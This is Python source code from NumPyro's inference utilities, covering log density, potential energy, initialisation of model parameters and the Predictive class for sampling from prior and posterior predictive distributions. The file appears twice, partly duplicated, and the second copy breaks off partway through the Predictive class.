model_trace = trace(
seed(substitute(masked_model, samples), rng_key)
).get_trace(*model_args, **model_kwargs)
pred_samples = {name: site["value"] for name, site in model_trace.items()}
if return_sites is not None:
if return_sites == "":
sites = {
k for k, site in model_trace.items() if site["type"] != "plate"
}
else:
sites = return_sites
else:
sites = {
k
for k, site in model_trace.items()
if (site["type"] == "sample" and k not in samples)
or (site["type"] == "deterministic")
}
return {name: value for name, value in pred_samples.items() if name in sites}
num_samples = int(np.prod(batch_shape))
if num_samples > 1:
rng_key = random.split(rng_key, num_samples)
rng_key = rng_key.reshape(batch_shape + (2,))
chunk_size = num_samples if parallel else 1
return soft_vmap(
single_prediction, (rng_key, posterior_samples), len(batch_shape), chunk_size
)
class Predictive(object):
"""
This class is used to construct predictive distribution. The predictive distribution is obtained
by running model conditioned on latent samples from `posterior_samples`.
.. warning::
The interface for the `Predictive` class is experimental, and
might change in the future.
:param model: Python callable containing Pyro primitives.
:param dict posterior_samples: dictionary of samples from the posterior.
:param callable guide: optional guide to get posterior samples of sites not present
in `posterior_samples`.
:param dict params: dictionary of values for param sites of model/guide.
:param int num_samples: number of samples
:param list return_sites: sites to return; by default only sample sites not present
in `posterior_samples` are returned.
:param bool infer_discrete: whether or not to sample discrete sites from the
posterior, conditioned on observations and other latent values in
``posterior_samples``. Under the hood, those sites will be marked with
``site["infer"]["enumerate"] = "parallel"``. See how `infer_discrete` works at
the `Pyro enumeration tutorial <https://pyro.ai/examples/enumeration.html>`_.
Note that this requires ``funsor`` installation.
:param bool parallel: whether to predict in parallel using JAX vectorized map :func:`jax.vmap`.
Defaults to False.
:param batch_ndims: the number of batch dimensions in posterior samples. Some usages:
+ set `batch_ndims=0` to get prediction for 1 single sample
+ set `batch_ndims=1` to get prediction for `posterior_samples`
with shapes `(num_samples x ...)`
+ set `batch_ndims=2` to get prediction for `posterior_samples`
with shapes `(num_chains x N x ...)`. Note that if `num_samples`
argument is not None, its value should be equal to `num_chains x N`.
:return: dict of samples from the predictive distribution.
**Example:**
Given a model::
def model(X, y=None):
...
return numpyro.sample("obs", likelihood, obs=y)
you can sample from the prior predictive::
predictive = Predictive(model, num_samples=1000)
y_pred = predictive(rng_key, X)["obs"]
If you also have posterior samples, you can sample from the posterior predictive::
predictive = Predictive(model, posterior_samples=posterior_samples)
y_pred = predictive(rng_key, X)["obs"]
See docstrings for :class:`~numpyro.infer.svi.SVI` and :class:`~numpyro.infer.mcmc.MCMCKernel`
to see example code of this in context.
"""
def __init__(
self,
model,
posterior_samples=None,
*,
guide=None,
params=None,
num_samples=None,
return_sites=None,
infer_discrete=False,
parallel=False,
batch_ndims=1,
):
if posterior_samples is None and num_samples is None:
raise ValueError(
"Either posterior_samples or num_samples must be specified."
)
posterior_samples = {} if posterior_samples is None else posterior_samples
prototype_site = batch_shape = batch_size = None
for name, sample in posterior_samples.items():
if batch_shape is not None and sample.shape[:batch_ndims] != batch_shape:
raise ValueError(
f"Batch shapes at site {name} and {prototype_site} "
f"should be the same, but got "
f"{sample.shape[:batch_ndims]} and {batch_shape}"
)
else:
prototype_site = name
batch_shape = sample.shape[:batch_ndims]
batch_size = int(np.prod(batch_shape))
if (num_samples is not None) and (num_samples != batch_size):
warnings.warn(
"Sample's batch dimension size {} is different from the "
"provided {} num_samples argument. Defaulting to {}.".format(
batch_size, num_samples, batch_size
),
UserWarning,
)
num_samples = batch_size
if num_samples is None:
raise ValueError(
"No sample sites in posterior samples to infer `num_samples`."
)
if batch_shape is None:
batch_shape = (1,) * (batch_ndims - 1) + (num_samples,)
if return_sites is not None:
assert isinstance(return_sites, (list, tuple, set))
self.model = model
self.posterior_samples = {} if posterior_samples is None else posterior_samples
self.num_samples = num_samples
self.guide = guide
self.params = {} if params is None else params
self.infer_discrete = infer_discrete
self.return_sites = return_sites
self.parallel = parallel
self.batch_ndims = batch_ndims
self._batch_shape = batch_shape
def __call__(self, rng_key, *args, **kwargs):
"""
Returns dict of samples from the predictive distribution. By default, only sample sites not
contained in `posterior_samples` are returned. This can be modified by changing the
`return_sites` keyword argument of this :class:`Predictive` instance.
:param jax.random.PRNGKey rng_key: random key to draw samples.
:param args: model arguments.
:param kwargs: model kwargs.
"""
posterior_samples = self.posterior_samples
if self.guide is not None:
rng_key, guide_rng_key = random.split(rng_key)
# use return_sites='' as a special signal to return all sites
guide = substitute(self.guide, self.params)
posterior_samples = _predictive(
guide_rng_key,
guide,
posterior_samples,
self._batch_shape,
return_sites="",
parallel=self.parallel,
model_args=args,
model_kwargs=kwargs,
)
model = substitute(self.model, self.params)
return _predictive(
rng_key,
model,
posterior_samples,
self._batch_shape,
return_sites=self.return_sites,
infer_discrete=self.infer_discrete,
parallel=self.parallel,
model_args=args,
model_kwargs=kwargs,
)
def log_likelihood(
model, posterior_samples, *args, parallel=False, batch_ndims=1, **kwargs
):
"""
(EXPERIMENTAL INTERFACE) Returns log likelihood at observation nodes of model,
given samples of all latent variables.
:param model: Python callable containing Pyro primitives.
:param dict posterior_samples: dictionary of samples from the posterior.
:param args: model arguments.
:param batch_ndims: the number of batch dimensions in posterior samples. Some usages:
+ set `batch_ndims=0` to get log likelihoods for 1 single sample
+ set `batch_ndims=1` to get log likelihoods for `posterior_samples`
with shapes `(num_samples x ...)`
+ set `batch_ndims=2` to get log likelihoods for `posterior_samples`
with shapes `(num_chains x num_samples x ...)`
:param kwargs: model kwargs.
:return: dict of log likelihoods at observation sites.
"""
def single_loglik(samples):
substituted_model = (
substitute(model, samples) if isinstance(samples, dict) else model
)
model_trace = trace(substituted_model).get_trace(*args, **kwargs)
return {
name: site["fn"].log_prob(site["value"])
for name, site in model_trace.items()
if site["type"] == "sample" and site["is_observed"]
}
prototype_site = batch_shape = None
for name, sample in posterior_samples.items():
if batch_shape is not None and jnp.shape(sample)[:batch_ndims] != batch_shape:
raise ValueError(
f"Batch shapes at site {name} and {prototype_site} "
f"should be the same, but got "
f"{sample.shape[:batch_ndims]} and {batch_shape}"
)
else:
prototype_site = name
batch_shape = jnp.shape(sample)[:batch_ndims]
if batch_shape is None: # posterior_samples is an empty dict
batch_shape = (1,) * batch_ndims
posterior_samples = np.zeros(batch_shape)
batch_size = int(np.prod(batch_shape))
chunk_size = batch_size if parallel else 1
return soft_vmap(single_loglik, posterior_samples, len(batch_shape), chunk_size)
@contextmanager
def helpful_support_errors(site, raise_warnings=False):
name = site["name"]
support = getattr(site["fn"], "support", None)
if isinstance(support, constraints.independent):
support = support.base_constraint
# Warnings
if raise_warnings:
if support is constraints.circular:
msg = (
f"Continuous inference poorly handles circular sample site '{name}'. "
+ "Consider using VonMises distribution together with "
+ "a reparameterizer, e.g. "
+ f"numpyro.handlers.reparam(config={{"{name}": CircularReparam()}})."
)
warnings.warn(msg, UserWarning)
# Exceptions
try:
yield
except NotImplementedError as e:
support_name = repr(support).lower()
if "integer" in support_name or "boolean" in support_name:
# TODO: mention enumeration when it is supported in SVI
raise ValueError(
f"Continuous inference cannot handle discrete sample site '{name}'."
)
if "sphere" in support_name:
raise ValueError(
f"Continuous inference cannot handle spherical sample site '{name}'. "
"Consider using ProjectedNormal distribution together with "
"a reparameterizer, e.g. "
f"numpyro.handlers.reparam(config={{"{name}": ProjectedNormalReparam()}})."
)
raise e from None
| # Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
from collections import namedtuple
from contextlib import contextmanager
from functools import partial
import warnings
import numpy as np
from jax import device_get, jacfwd, lax, random, value_and_grad
from jax.flatten_util import ravel_pytree
import jax.numpy as jnp
from jax.tree_util import tree_map
import numpyro
from numpyro.distributions import constraints
from numpyro.distributions.transforms import biject_to
from numpyro.distributions.util import is_identically_one, sum_rightmost
from numpyro.handlers import condition, replay, seed, substitute, trace
from numpyro.infer.initialization import init_to_uniform, init_to_value
from numpyro.util import not_jax_tracer, soft_vmap, while_loop
__all__ = [
"find_valid_initial_params",
"get_potential_fn",
"log_density",
"log_likelihood",
"potential_energy",
"initialize_model",
"Predictive",
]
ModelInfo = namedtuple(
"ModelInfo", ["param_info", "potential_fn", "postprocess_fn", "model_trace"]
)
ParamInfo = namedtuple("ParamInfo", ["z", "potential_energy", "z_grad"])
def log_density(model, model_args, model_kwargs, params):
"""
(EXPERIMENTAL INTERFACE) Computes log of joint density for the model given
latent values ``params``.
:param model: Python callable containing NumPyro primitives.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param dict params: dictionary of current parameter values keyed by site
name.
:return: log of joint density and a corresponding model trace
"""
model = substitute(model, data=params)
model_trace = trace(model).get_trace(*model_args, **model_kwargs)
log_joint = jnp.zeros(())
for site in model_trace.values():
if site["type"] == "sample":
value = site["value"]
intermediates = site["intermediates"]
scale = site["scale"]
if intermediates:
log_prob = site["fn"].log_prob(value, intermediates)
else:
log_prob = site["fn"].log_prob(value)
if (scale is not None) and (not is_identically_one(scale)):
log_prob = scale * log_prob
log_prob = jnp.sum(log_prob)
log_joint = log_joint + log_prob
return log_joint, model_trace
class _without_rsample_stop_gradient(numpyro.primitives.Messenger):
"""
Stop gradient for samples at latent sample sites for which has_rsample=False.
"""
def postprocess_message(self, msg):
if (
msg["type"] == "sample"
and (not msg["is_observed"])
and (not msg["fn"].has_rsample)
):
msg["value"] = lax.stop_gradient(msg["value"])
# TODO: reconsider this logic
# here we clear all the cached value so that gradients of log_prob(value) w.r.t.
# all parameters of the transformed distributions match the behavior of
# TransformedDistribution(d, transform) in Pyro with transform.cache_size == 0
msg["intermediates"] = None
def get_importance_trace(model, guide, args, kwargs, params):
"""
(EXPERIMENTAL) Returns traces from the guide and the model that is run against it.
The returned traces also store the log probability at each site.
.. note:: Gradients are blocked at latent sites which do not have reparametrized samplers.
"""
guide = substitute(guide, data=params)
with _without_rsample_stop_gradient():
guide_trace = trace(guide).get_trace(*args, **kwargs)
model = substitute(replay(model, guide_trace), data=params)
model_trace = trace(model).get_trace(*args, **kwargs)
for tr in (guide_trace, model_trace):
for site in tr.values():
if site["type"] == "sample":
if "log_prob" not in site:
value = site["value"]
intermediates = site["intermediates"]
scale = site["scale"]
if intermediates:
log_prob = site["fn"].log_prob(value, intermediates)
else:
log_prob = site["fn"].log_prob(value)
if (scale is not None) and (not is_identically_one(scale)):
log_prob = scale * log_prob
site["log_prob"] = log_prob
return model_trace, guide_trace
def transform_fn(transforms, params, invert=False):
"""
(EXPERIMENTAL INTERFACE) Callable that applies a transformation from the `transforms`
dict to values in the `params` dict and returns the transformed values keyed on
the same names.
:param transforms: Dictionary of transforms keyed by names. Names in
`transforms` and `params` should align.
:param params: Dictionary of arrays keyed by names.
:param invert: Whether to apply the inverse of the transforms.
:return: `dict` of transformed params.
"""
if invert:
transforms = {k: v.inv for k, v in transforms.items()}
return {k: transforms[k](v) if k in transforms else v for k, v in params.items()}
def constrain_fn(model, model_args, model_kwargs, params, return_deterministic=False):
"""
(EXPERIMENTAL INTERFACE) Gets value at each latent site in `model` given
unconstrained parameters `params`. The `transforms` is used to transform these
unconstrained parameters to base values of the corresponding priors in `model`.
If a prior is a transformed distribution, the corresponding base value lies in
the support of base distribution. Otherwise, the base value lies in the support
of the distribution.
:param model: a callable containing NumPyro primitives.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param dict params: dictionary of unconstrained values keyed by site
names.
:param bool return_deterministic: whether to return the value of `deterministic`
sites from the model. Defaults to `False`.
:return: `dict` of transformed params.
"""
def substitute_fn(site):
if site["name"] in params:
if site["type"] == "sample":
with helpful_support_errors(site):
return biject_to(site["fn"].support)(params[site["name"]])
else:
return params[site["name"]]
substituted_model = substitute(model, substitute_fn=substitute_fn)
model_trace = trace(substituted_model).get_trace(*model_args, **model_kwargs)
return {
k: v["value"]
for k, v in model_trace.items()
if (k in params) or (return_deterministic and (v["type"] == "deterministic"))
}
def _unconstrain_reparam(params, site):
name = site["name"]
if name in params:
p = params[name]
support = site["fn"].support
with helpful_support_errors(site):
t = biject_to(support)
# in scan, we might only want to substitute an item at index i, rather than the whole sequence
i = site["infer"].get("_scan_current_index", None)
if i is not None:
event_dim_shift = t.codomain.event_dim - t.domain.event_dim
expected_unconstrained_dim = len(site["fn"].shape()) - event_dim_shift
# check if p has additional time dimension
if jnp.ndim(p) > expected_unconstrained_dim:
p = p[i]
if support in [constraints.real, constraints.real_vector]:
return p
value = t(p)
log_det = t.log_abs_det_jacobian(p, value)
log_det = sum_rightmost(
log_det, jnp.ndim(log_det) - jnp.ndim(value) + len(site["fn"].event_shape)
)
if site["scale"] is not None:
log_det = site["scale"] * log_det
numpyro.factor("_{}_log_det".format(name), log_det)
return value
def potential_energy(model, model_args, model_kwargs, params, enum=False):
"""
(EXPERIMENTAL INTERFACE) Computes potential energy of a model given unconstrained params.
Under the hood, we will transform these unconstrained parameters to the values
belong to the supports of the corresponding priors in `model`.
:param model: a callable containing NumPyro primitives.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param dict params: unconstrained parameters of `model`.
:param bool enum: whether to enumerate over discrete latent sites.
:return: potential energy given unconstrained parameters.
"""
if enum:
from numpyro.contrib.funsor import log_density as log_density_
else:
log_density_ = log_density
substituted_model = substitute(
model, substitute_fn=partial(_unconstrain_reparam, params)
)
# no param is needed for log_density computation because we already substitute
log_joint, model_trace = log_density_(
substituted_model, model_args, model_kwargs, {}
)
return -log_joint
def _init_to_unconstrained_value(site=None, values={}):
if site is None:
return partial(_init_to_unconstrained_value, values=values)
def find_valid_initial_params(
rng_key,
model,
*,
init_strategy=init_to_uniform,
enum=False,
model_args=(),
model_kwargs=None,
prototype_params=None,
forward_mode_differentiation=False,
validate_grad=True,
):
"""
(EXPERIMENTAL INTERFACE) Given a model with Pyro primitives, returns an initial
valid unconstrained value for all the parameters. This function also returns
the corresponding potential energy, the gradients, and an
`is_valid` flag to say whether the initial parameters are valid. Parameter values
are considered valid if the values and the gradients for the log density have
finite values.
:param jax.random.PRNGKey rng_key: random number generator seed to
sample from the prior. The returned `init_params` will have the
batch shape ``rng_key.shape[:-1]``.
:param model: Python callable containing Pyro primitives.
:param callable init_strategy: a per-site initialization function.
:param bool enum: whether to enumerate over discrete latent sites.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param dict prototype_params: an optional prototype parameters, which is used
to define the shape for initial parameters.
:param bool forward_mode_differentiation: whether to use forward-mode differentiation
or reverse-mode differentiation. Defaults to False.
:param bool validate_grad: whether to validate gradient of the initial params.
Defaults to True.
:return: tuple of `init_params_info` and `is_valid`, where `init_params_info` is the tuple
containing the initial params, their potential energy, and their gradients.
"""
model_kwargs = {} if model_kwargs is None else model_kwargs
init_strategy = (
init_strategy if isinstance(init_strategy, partial) else init_strategy()
)
# handle those init strategies differently to save computation
if init_strategy.func is init_to_uniform:
radius = init_strategy.keywords.get("radius")
init_values = {}
elif init_strategy.func is _init_to_unconstrained_value:
radius = 2
init_values = init_strategy.keywords.get("values")
else:
radius = None
def cond_fn(state):
i, _, _, is_valid = state
return (i < 100) & (~is_valid)
def body_fn(state):
i, key, _, _ = state
key, subkey = random.split(key)
if radius is None or prototype_params is None:
# XXX: we don't want to apply enum to draw latent samples
model_ = model
if enum:
from numpyro.contrib.funsor import enum as enum_handler
if isinstance(model, substitute) and isinstance(model.fn, enum_handler):
model_ = substitute(model.fn.fn, data=model.data)
elif isinstance(model, enum_handler):
model_ = model.fn
# Wrap model in a `substitute` handler to initialize from `init_loc_fn`.
seeded_model = substitute(seed(model_, subkey), substitute_fn=init_strategy)
model_trace = trace(seeded_model).get_trace(*model_args, **model_kwargs)
constrained_values, inv_transforms = {}, {}
for k, v in model_trace.items():
if (
v["type"] == "sample"
and not v["is_observed"]
and not v["fn"].is_discrete
):
constrained_values[k] = v["value"]
with helpful_support_errors(v):
inv_transforms[k] = biject_to(v["fn"].support)
params = transform_fn(
inv_transforms,
{k: v for k, v in constrained_values.items()},
invert=True,
)
else: # this branch doesn't require tracing the model
params = {}
for k, v in prototype_params.items():
if k in init_values:
params[k] = init_values[k]
else:
params[k] = random.uniform(
subkey, jnp.shape(v), minval=-radius, maxval=radius
)
key, subkey = random.split(key)
potential_fn = partial(
potential_energy, model, model_args, model_kwargs, enum=enum
)
if validate_grad:
if forward_mode_differentiation:
pe = potential_fn(params)
z_grad = jacfwd(potential_fn)(params)
else:
pe, z_grad = value_and_grad(potential_fn)(params)
z_grad_flat = ravel_pytree(z_grad)[0]
is_valid = jnp.isfinite(pe) & jnp.all(jnp.isfinite(z_grad_flat))
else:
pe = potential_fn(params)
is_valid = jnp.isfinite(pe)
z_grad = None
return i + 1, key, (params, pe, z_grad), is_valid
def _find_valid_params(rng_key, exit_early=False):
init_state = (0, rng_key, (prototype_params, 0.0, prototype_params), False)
if exit_early and not_jax_tracer(rng_key):
# Early return if valid params found. This is only helpful for single chain,
# where we can avoid compiling body_fn in while_loop.
_, _, (init_params, pe, z_grad), is_valid = init_state = body_fn(init_state)
if not_jax_tracer(is_valid):
if device_get(is_valid):
return (init_params, pe, z_grad), is_valid
# XXX: this requires compiling the model, so for multi-chain, we trace the model 2-times
# even if the init_state is a valid result
_, _, (init_params, pe, z_grad), is_valid = while_loop(
cond_fn, body_fn, init_state
)
return (init_params, pe, z_grad), is_valid
# Handle possible vectorization
if rng_key.ndim == 1:
(init_params, pe, z_grad), is_valid = _find_valid_params(
rng_key, exit_early=True
)
else:
(init_params, pe, z_grad), is_valid = lax.map(_find_valid_params, rng_key)
return (init_params, pe, z_grad), is_valid
def _get_model_transforms(model, model_args=(), model_kwargs=None):
model_kwargs = {} if model_kwargs is None else model_kwargs
model_trace = trace(model).get_trace(*model_args, **model_kwargs)
inv_transforms = {}
# model code may need to be replayed in the presence of deterministic sites
replay_model = False
has_enumerate_support = False
for k, v in model_trace.items():
if v["type"] == "sample" and not v["is_observed"]:
if v["fn"].is_discrete:
has_enumerate_support = True
if not v["fn"].has_enumerate_support:
raise RuntimeError(
"MCMC only supports continuous sites or discrete sites "
f"with enumerate support, but got {type(v['fn']).__name__}."
)
else:
support = v["fn"].support
with helpful_support_errors(v, raise_warnings=True):
inv_transforms[k] = biject_to(support)
# XXX: the following code filters out most situations with dynamic supports
args = ()
if isinstance(support, constraints._GreaterThan):
args = ("lower_bound",)
elif isinstance(support, constraints._Interval):
args = ("lower_bound", "upper_bound")
for arg in args:
if not isinstance(getattr(support, arg), (int, float)):
replay_model = True
elif v["type"] == "deterministic":
replay_model = True
return inv_transforms, replay_model, has_enumerate_support, model_trace
def get_potential_fn(
model,
inv_transforms,
*,
enum=False,
replay_model=False,
dynamic_args=False,
model_args=(),
model_kwargs=None,
):
"""
(EXPERIMENTAL INTERFACE) Given a model with Pyro primitives, returns a
function which, given unconstrained parameters, evaluates the potential
energy (negative log joint density). In addition, this returns a
function to transform unconstrained values at sample sites to constrained
values within their respective support.
:param model: Python callable containing Pyro primitives.
:param dict inv_transforms: dictionary of transforms keyed by names.
:param bool enum: whether to enumerate over discrete latent sites.
:param bool replay_model: whether we need to replay model in
`postprocess_fn` to obtain `deterministic` sites.
:param bool dynamic_args: if `True`, the `potential_fn` and
`constraints_fn` are themselves dependent on model arguments.
When provided a `*model_args, **model_kwargs`, they return
`potential_fn` and `constraints_fn` callables, respectively.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:return: tuple of (`potential_fn`, `postprocess_fn`). The latter is used
to constrain unconstrained samples (e.g. those returned by HMC)
to values that lie within the site's support, and return values at
`deterministic` sites in the model.
"""
if dynamic_args:
def potential_fn(*args, **kwargs):
return partial(potential_energy, model, args, kwargs, enum=enum)
def postprocess_fn(*args, **kwargs):
if replay_model:
# XXX: we seed to sample discrete sites (but not collect them)
model_ = seed(model.fn, 0) if enum else model
return partial(
constrain_fn, model_, args, kwargs, return_deterministic=True
)
else:
return partial(transform_fn, inv_transforms)
else:
model_kwargs = {} if model_kwargs is None else model_kwargs
potential_fn = partial(
potential_energy, model, model_args, model_kwargs, enum=enum
)
if replay_model:
model_ = seed(model.fn, 0) if enum else model
postprocess_fn = partial(
constrain_fn,
model_,
model_args,
model_kwargs,
return_deterministic=True,
)
else:
postprocess_fn = partial(transform_fn, inv_transforms)
return potential_fn, postprocess_fn
def _guess_max_plate_nesting(model_trace):
"""
Guesses max_plate_nesting by using model trace.
This optimistically assumes static model
structure.
"""
sites = [site for site in model_trace.values() if site["type"] == "sample"]
dims = [
frame.dim
for site in sites
for frame in site["cond_indep_stack"]
if frame.dim is not None
]
max_plate_nesting = -min(dims) if dims else 0
return max_plate_nesting
# TODO: follow pyro.util.check_site_shape logics for more complete validation
def _validate_model(model_trace):
# XXX: this validates plate statements under `enum`
sites = [site for site in model_trace.values() if site["type"] == "sample"]
for site in sites:
batch_dims = len(site["fn"].batch_shape)
if site.get("_control_flow_done", False):
batch_dims = batch_dims - 1 # remove time dimension under scan
plate_dims = -min([0] + [frame.dim for frame in site["cond_indep_stack"]])
assert (
plate_dims >= batch_dims
), "Missing plate statement for batch dimensions at site {}".format(
site["name"]
)
def initialize_model(
rng_key,
model,
*,
init_strategy=init_to_uniform,
dynamic_args=False,
model_args=(),
model_kwargs=None,
forward_mode_differentiation=False,
validate_grad=True,
):
"""
(EXPERIMENTAL INTERFACE) Helper function that calls :func:`~numpyro.infer.util.get_potential_fn`
and :func:`~numpyro.infer.util.find_valid_initial_params` under the hood
to return a tuple of (`init_params_info`, `potential_fn`, `postprocess_fn`, `model_trace`).
:param jax.random.PRNGKey rng_key: random number generator seed to
sample from the prior. The returned `init_params` will have the
batch shape ``rng_key.shape[:-1]``.
:param model: Python callable containing Pyro primitives.
:param callable init_strategy: a per-site initialization function.
See :ref:`init_strategy` section for available functions.
:param bool dynamic_args: if `True`, the `potential_fn` and
`constraints_fn` are themselves dependent on model arguments.
When provided a `*model_args, **model_kwargs`, they return
`potential_fn` and `constraints_fn` callables, respectively.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param bool forward_mode_differentiation: whether to use forward-mode differentiation
or reverse-mode differentiation. By default, we use reverse mode but the forward
mode can be useful in some cases to improve the performance. In addition, some
control flow utility on JAX such as `jax.lax.while_loop` or `jax.lax.fori_loop`
only supports forward-mode differentiation. See
`JAX's The Autodiff Cookbook <https://jax.readthedocs.io/en/latest/notebooks/autodiff_cookbook.html>`_
for more information.
:param bool validate_grad: whether to validate gradient of the initial params.
Defaults to True.
:return: a namedtupe `ModelInfo` which contains the fields
(`param_info`, `potential_fn`, `postprocess_fn`, `model_trace`), where
`param_info` is a namedtuple `ParamInfo` containing values from the prior
used to initiate MCMC, their corresponding potential energy, and their gradients;
`postprocess_fn` is a callable that uses inverse transforms
to convert unconstrained HMC samples to constrained values that
lie within the site's support, in addition to returning values
at `deterministic` sites in the model.
"""
model_kwargs = {} if model_kwargs is None else model_kwargs
substituted_model = substitute(
seed(model, rng_key if jnp.ndim(rng_key) == 1 else rng_key[0]),
substitute_fn=init_strategy,
)
(
inv_transforms,
replay_model,
has_enumerate_support,
model_trace,
) = _get_model_transforms(substituted_model, model_args, model_kwargs)
# substitute param sites from model_trace to model so
# we don't need to generate again parameters of `numpyro.module`
model = substitute(
model,
data={
k: site["value"]
for k, site in model_trace.items()
if site["type"] in ["param"]
},
)
constrained_values = {
k: v["value"]
for k, v in model_trace.items()
if v["type"] == "sample" and not v["is_observed"] and not v["fn"].is_discrete
}
if has_enumerate_support:
from numpyro.contrib.funsor import config_enumerate, enum
if not isinstance(model, enum):
max_plate_nesting = _guess_max_plate_nesting(model_trace)
_validate_model(model_trace)
model = enum(config_enumerate(model), -max_plate_nesting - 1)
potential_fn, postprocess_fn = get_potential_fn(
model,
inv_transforms,
replay_model=replay_model,
enum=has_enumerate_support,
dynamic_args=dynamic_args,
model_args=model_args,
model_kwargs=model_kwargs,
)
init_strategy = (
init_strategy if isinstance(init_strategy, partial) else init_strategy()
)
if (init_strategy.func is init_to_value) and not replay_model:
init_values = init_strategy.keywords.get("values")
unconstrained_values = transform_fn(inv_transforms, init_values, invert=True)
init_strategy = _init_to_unconstrained_value(values=unconstrained_values)
prototype_params = transform_fn(inv_transforms, constrained_values, invert=True)
(init_params, pe, grad), is_valid = find_valid_initial_params(
rng_key,
substitute(
model,
data={
k: site["value"]
for k, site in model_trace.items()
if site["type"] in ["plate"]
},
),
init_strategy=init_strategy,
enum=has_enumerate_support,
model_args=model_args,
model_kwargs=model_kwargs,
prototype_params=prototype_params,
forward_mode_differentiation=forward_mode_differentiation,
validate_grad=validate_grad,
)
if not_jax_tracer(is_valid):
if device_get(~jnp.all(is_valid)):
with numpyro.validation_enabled(), trace() as tr:
# validate parameters
substituted_model(*model_args, **model_kwargs)
# validate values
for site in tr.values():
if site["type"] == "sample":
with warnings.catch_warnings(record=True) as ws:
site["fn"]._validate_sample(site["value"])
if len(ws) > 0:
for w in ws:
# at site information to the warning message
w.message.args = (
"Site {}: {}".format(
site["name"], w.message.args[0]
),
) + w.message.args[1:]
warnings.showwarning(
w.message,
w.category,
w.filename,
w.lineno,
file=w.file,
line=w.line,
)
raise RuntimeError(
"Cannot find valid initial parameters. Please check your model again."
)
return ModelInfo(
ParamInfo(init_params, pe, grad), potential_fn, postprocess_fn, model_trace
)
def _predictive(
rng_key,
model,
posterior_samples,
batch_shape,
return_sites=None,
infer_discrete=False,
parallel=True,
model_args=(),
model_kwargs={},
):
masked_model = numpyro.handlers.mask(model, mask=False)
if infer_discrete:
# inspect the model to get some structure
rng_key, subkey = random.split(rng_key)
batch_ndim = len(batch_shape)
prototype_sample = tree_map(
lambda x: jnp.reshape(x, (-1,) + jnp.shape(x)[batch_ndim:])[0],
posterior_samples,
)
prototype_trace = trace(
seed(substitute(masked_model, prototype_sample), subkey)
).get_trace(*model_args, **model_kwargs)
first_available_dim = -_guess_max_plate_nesting(prototype_trace) - 1
def single_prediction(val):
rng_key, samples = val
if infer_discrete:
from numpyro.contrib.funsor import config_enumerate
from numpyro.contrib.funsor.discrete import _sample_posterior
model_trace = prototype_trace
temperature = 1
pred_samples = _sample_posterior(
config_enumerate(condition(model, samples)),
first_available_dim,
temperature,
rng_key,
*model_args,
**model_kwargs,
)
else:
model_trace = trace(
seed(substitute(masked_model, samples), rng_key)
).get_trace(*model_args, **model_kwargs)
pred_samples = {name: site["value"] for name, site in model_trace.items()}
if return_sites is not None:
if return_sites == "":
sites = {
k for k, site in model_trace.items() if site["type"] != "plate"
}
else:
sites = return_sites
else:
sites = {
k
for k, site in model_trace.items()
if (site["type"] == "sample" and k not in samples)
or (site["type"] == "deterministic")
}
return {name: value for name, value in pred_samples.items() if name in sites}
num_samples = int(np.prod(batch_shape))
if num_samples > 1:
rng_key = random.split(rng_key, num_samples)
rng_key = rng_key.reshape(batch_shape + (2,))
chunk_size = num_samples if parallel else 1
return soft_vmap(
single_prediction, (rng_key, posterior_samples), len(batch_shape), chunk_size
)
class Predictive(object):
"""
This class is used to construct predictive distribution. The predictive distribution is obtained
by running model conditioned on latent samples from `posterior_samples`.
.. warning::
The interface for the `Predictive` class is experimental, and
might change in the future.
:param model: Python callable containing Pyro primitives.
:param dict posterior_samples: dictionary of samples from the posterior.
:param callable guide: optional guide to get posterior samples of sites not present
in `posterior_samples`.
:param dict params: dictionary of values for param sites of model/guide.
:param int num_samples: number of samples
:param list return_sites: sites to return; by default only sample sites not present
in `posterior_samples` are returned.
:param bool infer_discrete: whether or not to sample discrete sites from the
posterior, conditioned on observations and other latent values in
``posterior_samples``. Under the hood, those sites will be marked with
``site["infer"]["enumerate"] = "parallel"``. See how `infer_discrete` works at
the `Pyro enumeration tutorial <https://pyro.ai/examples/enumeration.html>`_.
Note that this requires ``funsor`` installation.
:param bool parallel: whether to predict in parallel using JAX vectorized map :func:`jax.vmap`.
Defaults to False.
:param batch_ndims: the number of batch dimensions in posterior samples. Some usages:
+ set `batch_ndims=0` to get prediction for 1 single sample
+ set `batch_ndims=1` to get prediction for `posterior_samples`
with shapes `(num_samples x ...)`
+ set `batch_ndims=2` to get prediction for `posterior_samples`
with shapes `(num_chains x N x ...)`. Note that if `num_samples`
argument is not None, its value should be equal to `num_chains x N`.
:return: dict of samples from the predictive distribution.
**Example:**
Given a model::
def model(X, y=None):
...
return numpyro.sample("obs", likelihood, obs=y)
you can sample from the prior predictive::
predictive = Predictive(model, num_samples=1000)
y_pred = predictive(rng_key, X)["obs"]
If you also have posterior samples, you can sample from the posterior predictive::
predictive = Predictive(model, posterior_samples=posterior_samples)
y_pred = predictive(rng_key, X)["obs"]
See docstrings for :class:`~numpyro.infer.svi.SVI` and :class:`~numpyro.infer.mcmc.MCMCKernel`
to see example code of this in context.
"""
def __init__(
self,
model,
posterior_samples=None,
*,
guide=None,
params=None,
num_samples=None,
return_sites=None,
infer_discrete=False,
parallel=False,
batch_ndims=1,
):
if posterior_samples is None and num_samples is None:
raise ValueError(
"Either posterior_samples or num_samples must be specified."
)
posterior_samples = {} if posterior_samples is None else posterior_samples
prototype_site = batch_shape = batch_size = None
for name, sample in posterior_samples.items():
if batch_shape is not None and sample.shape[:batch_ndims] != batch_shape:
raise ValueError(
f"Batch shapes at site {name} and {prototype_site} "
f"should be the same, but got "
f"{sample.shape[:batch_ndims]} and {batch_shape}"
)
else:
prototype_site = name
batch_shape = sample.shape[:batch_ndims]
batch_size = int(np.prod(batch_shape))
if (num_samples is not None) and (num_samples != batch_size):
warnings.warn(
"Sample's batch dimension size {} is different from the "
"provided {} num_samples argument. Defaulting to {}.".format(
batch_size, num_samples, batch_size
),
UserWarning,
)
num_samples = batch_size
if num_samples is None:
raise ValueError(
"No sample sites in posterior samples to infer `num_samples`."
)
if batch_shape is None:
batch_shape = (1,) * (batch_ndims - 1) + (num_samples,)
if return_sites is not None:
